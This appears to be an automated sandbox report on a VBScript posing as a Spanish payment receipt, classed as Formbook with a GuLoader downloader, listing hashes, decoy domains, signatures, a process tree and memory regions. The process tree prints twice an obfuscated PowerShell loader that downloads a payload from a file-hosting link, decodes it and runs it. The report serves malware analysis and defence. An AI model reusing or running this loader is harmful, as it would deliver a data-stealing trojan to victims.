Overview

overview

10

Static

static

1

justifican...df.vbs

windows7-x64

10

justifican...df.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    146s
  • max time network
    146s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    26-03-2024 12:43

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    justificante de pago_pdf.vbs

  • Size

    167KB

  • MD5

    46fc70d31386d4539f1195a8c16981ad

  • SHA1

    003035fe7f9d28c394486f1f0941a411ed70ff86

  • SHA256

    2021b29b0f29e42b35f7796a8c7615307d555dcc4b0bbacb599f246f556e810a

  • SHA512

    c4ad8b45cd303759d73d2fff7b48de7a42a050baea363fe51f1e61aef3b34dd8264bfac38080af93d7ab7ed03e122f374e33d679c9b0b5894a1db0615c695ce6

  • SSDEEP

    3072:KpK6/PeadLaz+kxSzn9Lj7rZeqGbHfNcckB+HGuG5Elx7d5czQON8DMXVMK8m:KpKyPeadLaz+k0zn1j7rZeqGbHfNcckd

Score
10/10
formbookguloadermo46downloaderpersistenceratspywarestealertrojan

Malware Config

Extracted

Family

formbook

Version

4.1

Campaign

mo46

Decoy

mnt75.link

3531.vip

mtb-treasusry.com

jgdripcases.com

fuwnjq5d.shop

viralking.shop

eternalflorist.store

fangsgang.media

healthinsuranceudeserve.com

nomadadvertiser.com

iwuqb.pics

marlboro-nissan.com

massagemdossonhos.online

guhapplay.com

ingenieriaautomotriz56.com

email-555.com

mirarestaurants.com

theblueflamelabs.us

floristeriatheclover.com

mpmngr.online

Signatures

  • Formbook

    Formbook is a data stealing malware which is capable of stealing data.

    trojanspywarestealerformbook
  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

    downloaderguloader
  • Formbook payload 4 IoCs
    rat
  • Adds policy Run key to start application 2 TTPs 1 IoCs
    persistence
  • Blocklisted process makes network request 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
    adwarespyware
  • Suspicious behavior: EnumeratesProcesses 13 IoCs
  • Suspicious behavior: MapViewOfSection 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 22 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1260
    • C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\justificante de pago_pdf.vbs"
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of WriteProcessMemory
      PID:1700
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "++$smaabrnsfamilie;++$smaabrnsfamilie;$smaabrnsfamilie=$smaabrnsfamilie-1;Function Bedsteforldres ($sejlsportens){$estrangelo=5;$estrangelo++;For($miljbeskyttelseskonventionernes=5; $miljbeskyttelseskonventionernes -lt $sejlsportens.Length-1; $miljbeskyttelseskonventionernes+=$estrangelo){$Elevraad = 'substring';$Unconfinedness=$sejlsportens.$Elevraad.Invoke($miljbeskyttelseskonventionernes, 1);$Monark=$Monark+$Unconfinedness}$Monark;}$Klediskens=Bedsteforldres ' Pol,hY.kokt DetltCockppOne.osTotal:Flu,f/Le em/ SnkndAss nrSubagi H.usvhy ereGeo.a.Overlg Diseo Trino Ousegsanktl LegieSubg .Blo mcP,oauopl,num Ove./EgnstuSa secRadio?afvige gentxInfecpCereboKem.kr ostet.urga=.akkedSty.toForskw go.snKatiklProvioVelseaEvoludI.ple&Sygevi Trapd.nkon=Forho1ArterkCoc ez Nothw CarbDM,rsaQVesteWWpm,r6AnforIBlackj sp l7Bela.0.oppid VindwXanthcIntabkE,her-Joll nmil,b6Gunni1KultuiDe,onl,stelsBallie SalgQTjeneYFrste2 DaahQ ar,vmHindhgKerneyU ligTT.rminIltog ';$Fastgoere=$Klediskens.split([char]62);$Klediskens=$Fastgoere[0];$Uarbejdsdygtig=Bedsteforldres 'DelibiSinuseNo.chxTaleb ';$Kinetogenic = Bedsteforldres 'Khett\UndiasStam,yRustfs Phr wDrsaloAale wAchol6 Gr,p4 Erin\ franWBeta,iLo.alnNeurodcolo oHyperwClysesSonlePBea.eoarvirwTranseAmphirEcto.SGodkehSytteeS.kkelpa sel Cath\Ud,omvArbej1Tige,. Fest0Ponyi\.alampviktuoOmve.w KraeeLeverrJoistsTidobhStoice Precl Par,lmulew.BrandeCata xPe,ole Bran ';&($Uarbejdsdygtig) (Bedsteforldres 'Caneb$OutseNAnakioBlo,pnHept,pSquane SlaurS aphiSvirrlFluoroUdr.duPhytosFor.tlOpgreyMeder= De.o$ Inspe CynanB,evivT,ans:No.sewhelpaiI.esinEvangdLaveriSignarEnski ') ;&($Uarbejdsdygtig) (Bedsteforldres 'Fritu$TmrerKUnstoiLspedn .leteU.iont ,ermoUnverg Ter eHassenDobbeiAlgebc Fran=Over $ExophN BetioPhenonU,hngpBoli,emikrorChlo icoupalSipu o,uderuAkhu,s Di.elNeff,y Rege+Serpe$ RubiKTnne,iDanskn Stepe,elekt.tregoBottogUl.raeMicrunChicaiLabricPremu ') ;&($Uarbejdsdygtig) (Bedsteforldres 'Clean$DanskH In raNis enTrkkenFutt,yTril,s Spor Sten=Ge ph Gree(parc (B,eakgOverwwV,karm Dgn.i Yod, T.nanwgenetiVaa,enSlett3Subtr2,imme_ Pupap,yinzrHandlo.ollocOvereeUn,yssPio,es.libn Typeb-PrediFDsigr SansePplanlrSvejtoSheltc holeeTjen sSvindsscantIDiscodCamac= Un.u$Eskad{ SnesPBrdbaIT rfaDRe,er}Legeo)Misl,.Ko psCForaroOlenemMindem BonaaAtominF.razdSkopuLKi uriArbejnMccareAb,ik)F,rho Supe-Semims omanp TofolBeefii jametPie,e Sjles[,athecMeninhFingea ricr Mo i]Sejlb3L.tra4 Hexa ');&($Uarbejdsdygtig) (Bedsteforldres ' Sp,n$ ackiQFlskeuDoubla ycofg U,ros rog St.nd=m ppi Kaker$SaxtiHTeaktaFeltunTauron SatayPaakrsMarke[Overs$ orcHA.ngra DinknG.avenPrepayNdla.sfdrel. torsc porto TreduPearcnCamo.tRe.ur- Pidd2Cevic].nurp ');&($Uarbejdsdygtig) (Bedsteforldres 'Udsk $Supp,AClifftConcula bejaBrevpsAf albCen.rl,ejloa.olecdBajere Midt=Pivot(AntefTT.gneeForrasInte,tEnlig-Pro.ePFunguaBaldytFoochhBille Far a$OvercKDagskiOutlynUdm,neforstt Mar.oLovplgBedereZori.nBall.iUntanc Byg,)Anti, Falde-Avoc,AbahumnN,dzhd Hyst Afkl,( vera[PolycIKattynS,irmtB elgPPrdi t AmbirTold ]Udsp,:bur,e:Pretrs S,alish.lezLamareSapro N.dsk- ResueComplqShamp For.8 Apot)zeoli ') ;if ($Atlasblade) {.$Kinetogenic $Quags;} else {;$Disinfectants205=Bedsteforldres 'BenumS EksttForspaBasidrRettitTyran-In,jaBUng,uiUnde tMyldrsBetjeTalbinrStvveaIncurnFlumysDel afBumleeHypotrNonse omp-DirekS TromoAngiouPeradrS,rivcNo.steRevse Natur$Unco.K C,oklLrlineUnderdBer,fiGurr.sKollekm.rice ConvnudbldsCupse Str,f-LoreaDCollae,mfetsArchat,urkaiGudlsnNe,teaInhibt ommiiOndseoSkil,nH.lpe Chef$Mili NDrej oSelvanSvejfpAkko,e ReivrMiscoiD.scilNoninoHobhou SammsTricalGodseyErice ';&($Uarbejdsdygtig) (Bedsteforldres 'Mut g$SmkkeNPreenoDrapenEn,lnp Folke,traar RequiSk.belMastioOutc u uriesSla.ilModsiyNondi=Al er$Kv dieSlambnNonrevbag r:Sj,leaMeninpKrigspParked VenoaGennetStabiaOlig, ') ;&($Uarbejdsdygtig) (Bedsteforldres 'nglepIPalinm rbepBlankoGla.or In,bt Lill-PatchM AnkeostemmdBlokbuSpe tlGe,gleModta SavatBInc miansvat Un,osU,indTMobbirsrbesa Billn B,ndsNonarfNideueSpirarKends ') ;$Nonperilously=$Nonperilously+'\Kasmira.Els';while (-not $Resplendent) {&($Uarbejdsdygtig) (Bedsteforldres 'Outba$E cloRinuree .nprsLithop Misel,onceeQuarrnDemardSkrideG obin Extet Path=Signi(payabTJungieSknd,s QuivtNegre- SpinPSkurka ,odetKolonhFejlm Delbe$NanniN AntioBestynforflpNajedeMargar mudsi Und lStri oSkat,u La tsTastelsk.tty Nrin)monar ') ;&($Uarbejdsdygtig) $Disinfectants205;&($Uarbejdsdygtig) (Bedsteforldres 'Forf SGallit Ti,sapladsr ordrtTasta-MillwSProcel PatreFryseeHegnep Fedr Fornr5Lukan ');$Klediskens=$Fastgoere[$Dysfunktioner++%$Fastgoere.count];}&($Uarbejdsdygtig) (Bedsteforldres 'Snyde$BroomUSkurenGuttsw ntomi Forlt LogasPt.ra Andro=Typa BrdknGliveneB.stiter,en- PropCDi.coo MyxonFecultOrnameEthern.ignit rnas Hem.t$SovieNSnorroT plonUnprepHukome E,farGrnsviAmusilAfrinoPoussuFors.so,erflMagtsy,nise ');&($Uarbejdsdygtig) (Bedsteforldres 'Trbu $ .rthRA.ulegS,estt Ver.oLoinebTalukaEpiplkDeton Av g=Ope,a Carat[NonflS Carcy atios,dvektGenmaeLavytmHyper.BronzCTerrio.agsbnfyldjvAktive Dat r Mfint Torn]R,gma:merkh:TaktiFVagt rS.allo DisimIntegBSemivaRektisVolumeAught6Ptero4UbesiS,asertbankor BookiEgernn,egisgpulve(Vis t$Faa.aUBlsebnSkil,wMi,liiUncort.hoomsvrkfr) Tipt ');&($Uarbejdsdygtig) (Bedsteforldres 'Skynd$ AttrEAm,lekUkampsFeroca.houlmMagree T.ngnSaddlsactuao FritrKommadVii,dnpachyiSu,sdnDo,umg SchieKamphrTaft. Hv el=Ja,ke stell[ActivSHand.y mosqs SnuptMe.oreOdyssmKvl.i.BrugeTIndplePrissxGlegltMa,to.Mil iE ThulnRos lcPrereoIndr dIndiuiMun.hnLiquogPensi]Jetpo:Enr,d: Go,nALo.alSMu,tiCRackmI dgaIArbej.act.nGParlre Ili.t FretS F retPo,itrTunfiiCirrin im rg.alvt(Night$EksplROve sgkvarttMustfoNonp.bTankeaArenakrosul)Actin ');&($Uarbejdsdygtig) (Bedsteforldres 'Labyr$ PhonKk,teraRaglatInfraoPositd arlseMes.r=Cuida$SvensEAtomukI.norsCollyaEftermJubileTjavsnG belsSonjaoFosterNubredU.sconTaljeiAfsenn ossgUndefeShougrFaint. PraisIgn mu bndsbBoti,sKorset Kompr VesiiVortindi bagReach( nani3T rbi0Hydro9 dema3Vinte3attor2Ko st, Skmm2B lti6 Nair0Acces0Husvi5Shadu)Overc ');&($Uarbejdsdygtig) $Katode;}"
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2796
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "++$smaabrnsfamilie;++$smaabrnsfamilie;$smaabrnsfamilie=$smaabrnsfamilie-1;Function Bedsteforldres ($sejlsportens){$estrangelo=5;$estrangelo++;For($miljbeskyttelseskonventionernes=5; $miljbeskyttelseskonventionernes -lt $sejlsportens.Length-1; $miljbeskyttelseskonventionernes+=$estrangelo){$Elevraad = 'substring';$Unconfinedness=$sejlsportens.$Elevraad.Invoke($miljbeskyttelseskonventionernes, 1);$Monark=$Monark+$Unconfinedness}$Monark;}$Klediskens=Bedsteforldres ' Pol,hY.kokt DetltCockppOne.osTotal:Flu,f/Le em/ SnkndAss nrSubagi H.usvhy ereGeo.a.Overlg Diseo Trino Ousegsanktl LegieSubg .Blo mcP,oauopl,num Ove./EgnstuSa secRadio?afvige gentxInfecpCereboKem.kr ostet.urga=.akkedSty.toForskw go.snKatiklProvioVelseaEvoludI.ple&Sygevi Trapd.nkon=Forho1ArterkCoc ez Nothw CarbDM,rsaQVesteWWpm,r6AnforIBlackj sp l7Bela.0.oppid VindwXanthcIntabkE,her-Joll nmil,b6Gunni1KultuiDe,onl,stelsBallie SalgQTjeneYFrste2 DaahQ ar,vmHindhgKerneyU ligTT.rminIltog ';$Fastgoere=$Klediskens.split([char]62);$Klediskens=$Fastgoere[0];$Uarbejdsdygtig=Bedsteforldres 'DelibiSinuseNo.chxTaleb ';$Kinetogenic = Bedsteforldres 'Khett\UndiasStam,yRustfs Phr wDrsaloAale wAchol6 Gr,p4 Erin\ franWBeta,iLo.alnNeurodcolo oHyperwClysesSonlePBea.eoarvirwTranseAmphirEcto.SGodkehSytteeS.kkelpa sel Cath\Ud,omvArbej1Tige,. Fest0Ponyi\.alampviktuoOmve.w KraeeLeverrJoistsTidobhStoice Precl Par,lmulew.BrandeCata xPe,ole Bran ';&($Uarbejdsdygtig) (Bedsteforldres 'Caneb$OutseNAnakioBlo,pnHept,pSquane SlaurS aphiSvirrlFluoroUdr.duPhytosFor.tlOpgreyMeder= De.o$ Inspe CynanB,evivT,ans:No.sewhelpaiI.esinEvangdLaveriSignarEnski ') ;&($Uarbejdsdygtig) (Bedsteforldres 'Fritu$TmrerKUnstoiLspedn .leteU.iont ,ermoUnverg Ter eHassenDobbeiAlgebc Fran=Over $ExophN BetioPhenonU,hngpBoli,emikrorChlo icoupalSipu o,uderuAkhu,s Di.elNeff,y Rege+Serpe$ RubiKTnne,iDanskn Stepe,elekt.tregoBottogUl.raeMicrunChicaiLabricPremu ') ;&($Uarbejdsdygtig) (Bedsteforldres 'Clean$DanskH In raNis enTrkkenFutt,yTril,s Spor Sten=Ge ph Gree(parc (B,eakgOverwwV,karm Dgn.i Yod, T.nanwgenetiVaa,enSlett3Subtr2,imme_ Pupap,yinzrHandlo.ollocOvereeUn,yssPio,es.libn Typeb-PrediFDsigr SansePplanlrSvejtoSheltc holeeTjen sSvindsscantIDiscodCamac= Un.u$Eskad{ SnesPBrdbaIT rfaDRe,er}Legeo)Misl,.Ko psCForaroOlenemMindem BonaaAtominF.razdSkopuLKi uriArbejnMccareAb,ik)F,rho Supe-Semims omanp TofolBeefii jametPie,e Sjles[,athecMeninhFingea ricr Mo i]Sejlb3L.tra4 Hexa ');&($Uarbejdsdygtig) (Bedsteforldres ' Sp,n$ ackiQFlskeuDoubla ycofg U,ros rog St.nd=m ppi Kaker$SaxtiHTeaktaFeltunTauron SatayPaakrsMarke[Overs$ orcHA.ngra DinknG.avenPrepayNdla.sfdrel. torsc porto TreduPearcnCamo.tRe.ur- Pidd2Cevic].nurp ');&($Uarbejdsdygtig) (Bedsteforldres 'Udsk $Supp,AClifftConcula bejaBrevpsAf albCen.rl,ejloa.olecdBajere Midt=Pivot(AntefTT.gneeForrasInte,tEnlig-Pro.ePFunguaBaldytFoochhBille Far a$OvercKDagskiOutlynUdm,neforstt Mar.oLovplgBedereZori.nBall.iUntanc Byg,)Anti, Falde-Avoc,AbahumnN,dzhd Hyst Afkl,( vera[PolycIKattynS,irmtB elgPPrdi t AmbirTold ]Udsp,:bur,e:Pretrs S,alish.lezLamareSapro N.dsk- ResueComplqShamp For.8 Apot)zeoli ') ;if ($Atlasblade) {.$Kinetogenic $Quags;} else {;$Disinfectants205=Bedsteforldres 'BenumS EksttForspaBasidrRettitTyran-In,jaBUng,uiUnde tMyldrsBetjeTalbinrStvveaIncurnFlumysDel afBumleeHypotrNonse omp-DirekS TromoAngiouPeradrS,rivcNo.steRevse Natur$Unco.K C,oklLrlineUnderdBer,fiGurr.sKollekm.rice ConvnudbldsCupse Str,f-LoreaDCollae,mfetsArchat,urkaiGudlsnNe,teaInhibt ommiiOndseoSkil,nH.lpe Chef$Mili NDrej oSelvanSvejfpAkko,e ReivrMiscoiD.scilNoninoHobhou SammsTricalGodseyErice ';&($Uarbejdsdygtig) (Bedsteforldres 'Mut g$SmkkeNPreenoDrapenEn,lnp Folke,traar RequiSk.belMastioOutc u uriesSla.ilModsiyNondi=Al er$Kv dieSlambnNonrevbag r:Sj,leaMeninpKrigspParked VenoaGennetStabiaOlig, ') ;&($Uarbejdsdygtig) (Bedsteforldres 'nglepIPalinm rbepBlankoGla.or In,bt Lill-PatchM AnkeostemmdBlokbuSpe tlGe,gleModta SavatBInc miansvat Un,osU,indTMobbirsrbesa Billn B,ndsNonarfNideueSpirarKends ') ;$Nonperilously=$Nonperilously+'\Kasmira.Els';while (-not $Resplendent) {&($Uarbejdsdygtig) (Bedsteforldres 'Outba$E cloRinuree .nprsLithop Misel,onceeQuarrnDemardSkrideG obin Extet Path=Signi(payabTJungieSknd,s QuivtNegre- SpinPSkurka ,odetKolonhFejlm Delbe$NanniN AntioBestynforflpNajedeMargar mudsi Und lStri oSkat,u La tsTastelsk.tty Nrin)monar ') ;&($Uarbejdsdygtig) $Disinfectants205;&($Uarbejdsdygtig) (Bedsteforldres 'Forf SGallit Ti,sapladsr ordrtTasta-MillwSProcel PatreFryseeHegnep Fedr Fornr5Lukan ');$Klediskens=$Fastgoere[$Dysfunktioner++%$Fastgoere.count];}&($Uarbejdsdygtig) (Bedsteforldres 'Snyde$BroomUSkurenGuttsw ntomi Forlt LogasPt.ra Andro=Typa BrdknGliveneB.stiter,en- PropCDi.coo MyxonFecultOrnameEthern.ignit rnas Hem.t$SovieNSnorroT plonUnprepHukome E,farGrnsviAmusilAfrinoPoussuFors.so,erflMagtsy,nise ');&($Uarbejdsdygtig) (Bedsteforldres 'Trbu $ .rthRA.ulegS,estt Ver.oLoinebTalukaEpiplkDeton Av g=Ope,a Carat[NonflS Carcy atios,dvektGenmaeLavytmHyper.BronzCTerrio.agsbnfyldjvAktive Dat r Mfint Torn]R,gma:merkh:TaktiFVagt rS.allo DisimIntegBSemivaRektisVolumeAught6Ptero4UbesiS,asertbankor BookiEgernn,egisgpulve(Vis t$Faa.aUBlsebnSkil,wMi,liiUncort.hoomsvrkfr) Tipt ');&($Uarbejdsdygtig) (Bedsteforldres 'Skynd$ AttrEAm,lekUkampsFeroca.houlmMagree T.ngnSaddlsactuao FritrKommadVii,dnpachyiSu,sdnDo,umg SchieKamphrTaft. Hv el=Ja,ke stell[ActivSHand.y mosqs SnuptMe.oreOdyssmKvl.i.BrugeTIndplePrissxGlegltMa,to.Mil iE ThulnRos lcPrereoIndr dIndiuiMun.hnLiquogPensi]Jetpo:Enr,d: Go,nALo.alSMu,tiCRackmI dgaIArbej.act.nGParlre Ili.t FretS F retPo,itrTunfiiCirrin im rg.alvt(Night$EksplROve sgkvarttMustfoNonp.bTankeaArenakrosul)Actin ');&($Uarbejdsdygtig) (Bedsteforldres 'Labyr$ PhonKk,teraRaglatInfraoPositd arlseMes.r=Cuida$SvensEAtomukI.norsCollyaEftermJubileTjavsnG belsSonjaoFosterNubredU.sconTaljeiAfsenn ossgUndefeShougrFaint. PraisIgn mu bndsbBoti,sKorset Kompr VesiiVortindi bagReach( nani3T rbi0Hydro9 dema3Vinte3attor2Ko st, Skmm2B lti6 Nair0Acces0Husvi5Shadu)Overc ');&($Uarbejdsdygtig) $Katode;}"
          4⤵
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2884
          • C:\Program Files (x86)\windows mail\wab.exe
            "C:\Program Files (x86)\windows mail\wab.exe"
            5⤵
            • Suspicious use of NtCreateThreadExHideFromDebugger
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of AdjustPrivilegeToken
            PID:840
    • C:\Windows\SysWOW64\mstsc.exe
      "C:\Windows\SysWOW64\mstsc.exe"
      2⤵
      • Adds policy Run key to start application
      • Adds Run key to start application
      • Suspicious use of SetThreadContext
      • Modifies Internet Explorer settings
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2112
      • C:\Program Files\Mozilla Firefox\Firefox.exe
        "C:\Program Files\Mozilla Firefox\Firefox.exe"
        3⤵
          PID:1680

    Network

    MITRE ATT&CK Matrix ATT&CK v13

    Initial Access

    Execution

    Persistence

    Boot or Logon Autostart Execution

    2
    T1547

    Registry Run Keys / Startup Folder

    2
    T1547.001

    Privilege Escalation

    Boot or Logon Autostart Execution

    2
    T1547

    Registry Run Keys / Startup Folder

    2
    T1547.001

    Defense Evasion

    Modify Registry

    3
    T1112

    Credential Access

    Discovery

    System Information Discovery

    1
    T1082

    Lateral Movement

    Collection

    Exfiltration

    Command and Control

    Web Service

    1
    T1102

    Impact

    Resource Development

    Reconnaissance

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
      Filesize

      67KB

      MD5

      753df6889fd7410a2e9fe333da83a429

      SHA1

      3c425f16e8267186061dd48ac1c77c122962456e

      SHA256

      b42dc237e44cbc9a43400e7d3f9cbd406dbdefd62bfe87328f8663897d69df78

      SHA512

      9d56f79410ad0cf852c74c3ef9454e7ae86e80bdd6ff67773994b48ccac71142bcf5c90635da6a056e1406e81e64674db9584928e867c55b77b59e2851cf6444

      Download Submit
    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      344B

      MD5

      92ee7f67cec4affc2e01263041b93577

      SHA1

      f96fc1650195f43a4655e738ee2cfb9b609ac084

      SHA256

      3dfc94871396161991cb8ba89859b3e79214e787e38cf7785305ce195dbc28b6

      SHA512

      5625bb79f6c0d9941709d9f002dbae2dbd4353eab6fb0f03413cc022bf6bf4583d79b7552821408d37ad964f8fcf282ddfdda0004798732eb4994267f56d527e

      Download Submit
    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      344B

      MD5

      8530f39134fe257a04bfec048f12bdb5

      SHA1

      9583978f52273a3ce65685d2aad1704d5d24d5d8

      SHA256

      648617d19bd36506129ca2c214759e264ce28e0ed0a83971fdd5f16e3cdc9023

      SHA512

      7d0efb54bbe0a00b6dbb1cb88ee933e1c8599b3d12af82272fb07b0dad87f3624dc280de17c009ab3a949f24a2c1b81caee0c8cc372383943b5a40a1fd3bce49

      Download Submit
    • C:\Users\Admin\AppData\Local\Temp\Tar8113.tmp
      Filesize

      175KB

      MD5

      dd73cead4b93366cf3465c8cd32e2796

      SHA1

      74546226dfe9ceb8184651e920d1dbfb432b314e

      SHA256

      a6752b7851b591550e4625b832a393aabcc428de18d83e8593cd540f7d7cae22

      SHA512

      ce1bdd595065c94fa528badf4a6a8777893807d6789267612755df818ba6ffe55e4df429710aea29526ee4aa8ef20e25f2f05341da53992157d21ae032c0fb63

      Download Submit
    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\E17BW65WASOWIIU77ZNJ.temp
      Filesize

      7KB

      MD5

      23d25f343a111fbdc4cb52f10c29792d

      SHA1

      0f23a286551bb295d49ed97c09659bd5e62889bc

      SHA256

      bb3874a8f2da8e55575f4533b32159f478167b0237a0bb80887948475d4747e2

      SHA512

      4417334584b427dc8729b51036c20d84bd4db394ede27725a6a1157fc46bf22d5e3b10e49c0ede245481c18244b87bb8022d13e8e6ce91fbdf33947e1d75ccd3

      Download Submit
    • memory/840-60-0x0000000076F60000-0x0000000077109000-memory.dmp
      Filesize

      1.7MB

      Download
    • memory/840-89-0x0000000000400000-0x0000000000581000-memory.dmp
      Filesize

      1.5MB

      Download
    • memory/840-104-0x0000000000590000-0x00000000023F1000-memory.dmp
      Filesize

      30.4MB

      Download
    • memory/840-61-0x0000000077150000-0x0000000077226000-memory.dmp
      Filesize

      856KB

      Download
    • memory/840-63-0x0000000000400000-0x0000000000581000-memory.dmp
      Filesize

      1.5MB

      Download
    • memory/840-96-0x00000000002F0000-0x0000000000304000-memory.dmp
      Filesize

      80KB

      Download
    • memory/840-82-0x0000000000590000-0x00000000023F1000-memory.dmp
      Filesize

      30.4MB

      Download
    • memory/840-95-0x0000000000400000-0x0000000000581000-memory.dmp
      Filesize

      1.5MB

      Download
    • memory/840-93-0x000000001E780000-0x000000001EA83000-memory.dmp
      Filesize

      3.0MB

      Download
    • memory/840-62-0x0000000077186000-0x0000000077187000-memory.dmp
      Filesize

      4KB

      Download
    • memory/840-59-0x0000000000590000-0x00000000023F1000-memory.dmp
      Filesize

      30.4MB

      Download
    • memory/840-85-0x0000000076F60000-0x0000000077109000-memory.dmp
      Filesize

      1.7MB

      Download
    • memory/1260-94-0x0000000003810000-0x0000000003910000-memory.dmp
      Filesize

      1024KB

      Download
    • memory/1260-98-0x0000000004220000-0x00000000042DC000-memory.dmp
      Filesize

      752KB

      Download
    • memory/2112-103-0x0000000000080000-0x00000000000AF000-memory.dmp
      Filesize

      188KB

      Download
    • memory/2112-101-0x0000000000AA0000-0x0000000000BA4000-memory.dmp
      Filesize

      1.0MB

      Download
    • memory/2112-116-0x0000000000A00000-0x0000000000A93000-memory.dmp
      Filesize

      588KB

      Download
    • memory/2112-111-0x0000000000A00000-0x0000000000A93000-memory.dmp
      Filesize

      588KB

      Download
    • memory/2112-106-0x0000000000080000-0x00000000000AF000-memory.dmp
      Filesize

      188KB

      Download
    • memory/2112-105-0x0000000002140000-0x0000000002443000-memory.dmp
      Filesize

      3.0MB

      Download
    • memory/2112-102-0x0000000000AA0000-0x0000000000BA4000-memory.dmp
      Filesize

      1.0MB

      Download
    • memory/2796-26-0x0000000002740000-0x00000000027C0000-memory.dmp
      Filesize

      512KB

      Download
    • memory/2796-21-0x000007FEF5400000-0x000007FEF5D9D000-memory.dmp
      Filesize

      9.6MB

      Download
    • memory/2796-45-0x000007FEF5400000-0x000007FEF5D9D000-memory.dmp
      Filesize

      9.6MB

      Download
    • memory/2796-97-0x000007FEF5400000-0x000007FEF5D9D000-memory.dmp
      Filesize

      9.6MB

      Download
    • memory/2796-25-0x00000000026B0000-0x00000000026B8000-memory.dmp
      Filesize

      32KB

      Download
    • memory/2796-24-0x0000000002740000-0x00000000027C0000-memory.dmp
      Filesize

      512KB

      Download
    • memory/2796-22-0x0000000002740000-0x00000000027C0000-memory.dmp
      Filesize

      512KB

      Download
    • memory/2796-48-0x0000000002740000-0x00000000027C0000-memory.dmp
      Filesize

      512KB

      Download
    • memory/2796-47-0x0000000002740000-0x00000000027C0000-memory.dmp
      Filesize

      512KB

      Download
    • memory/2796-46-0x0000000002740000-0x00000000027C0000-memory.dmp
      Filesize

      512KB

      Download
    • memory/2796-23-0x000000001B2E0000-0x000000001B5C2000-memory.dmp
      Filesize

      2.9MB

      Download
    • memory/2884-91-0x0000000072FA0000-0x000000007354B000-memory.dmp
      Filesize

      5.7MB

      Download
    • memory/2884-92-0x0000000006420000-0x0000000008281000-memory.dmp
      Filesize

      30.4MB

      Download
    • memory/2884-53-0x0000000005300000-0x0000000005301000-memory.dmp
      Filesize

      4KB

      Download
    • memory/2884-49-0x0000000072FA0000-0x000000007354B000-memory.dmp
      Filesize

      5.7MB

      Download
    • memory/2884-33-0x0000000002420000-0x0000000002460000-memory.dmp
      Filesize

      256KB

      Download
    • memory/2884-32-0x0000000002420000-0x0000000002460000-memory.dmp
      Filesize

      256KB

      Download
    • memory/2884-90-0x0000000002420000-0x0000000002460000-memory.dmp
      Filesize

      256KB

      Download
    • memory/2884-31-0x0000000002420000-0x0000000002460000-memory.dmp
      Filesize

      256KB

      Download
    • memory/2884-50-0x0000000002420000-0x0000000002460000-memory.dmp
      Filesize

      256KB

      Download
    • memory/2884-58-0x0000000006420000-0x0000000008281000-memory.dmp
      Filesize

      30.4MB

      Download
    • memory/2884-30-0x0000000072FA0000-0x000000007354B000-memory.dmp
      Filesize

      5.7MB

      Download
    • memory/2884-29-0x0000000072FA0000-0x000000007354B000-memory.dmp
      Filesize

      5.7MB

      Download
    • memory/2884-57-0x0000000077150000-0x0000000077226000-memory.dmp
      Filesize

      856KB

      Download
    • memory/2884-56-0x0000000076F60000-0x0000000077109000-memory.dmp
      Filesize

      1.7MB

      Download
    • memory/2884-55-0x0000000006420000-0x0000000008281000-memory.dmp
      Filesize

      30.4MB

      Download
    • memory/2884-54-0x0000000006420000-0x0000000008281000-memory.dmp
      Filesize

      30.4MB

      Download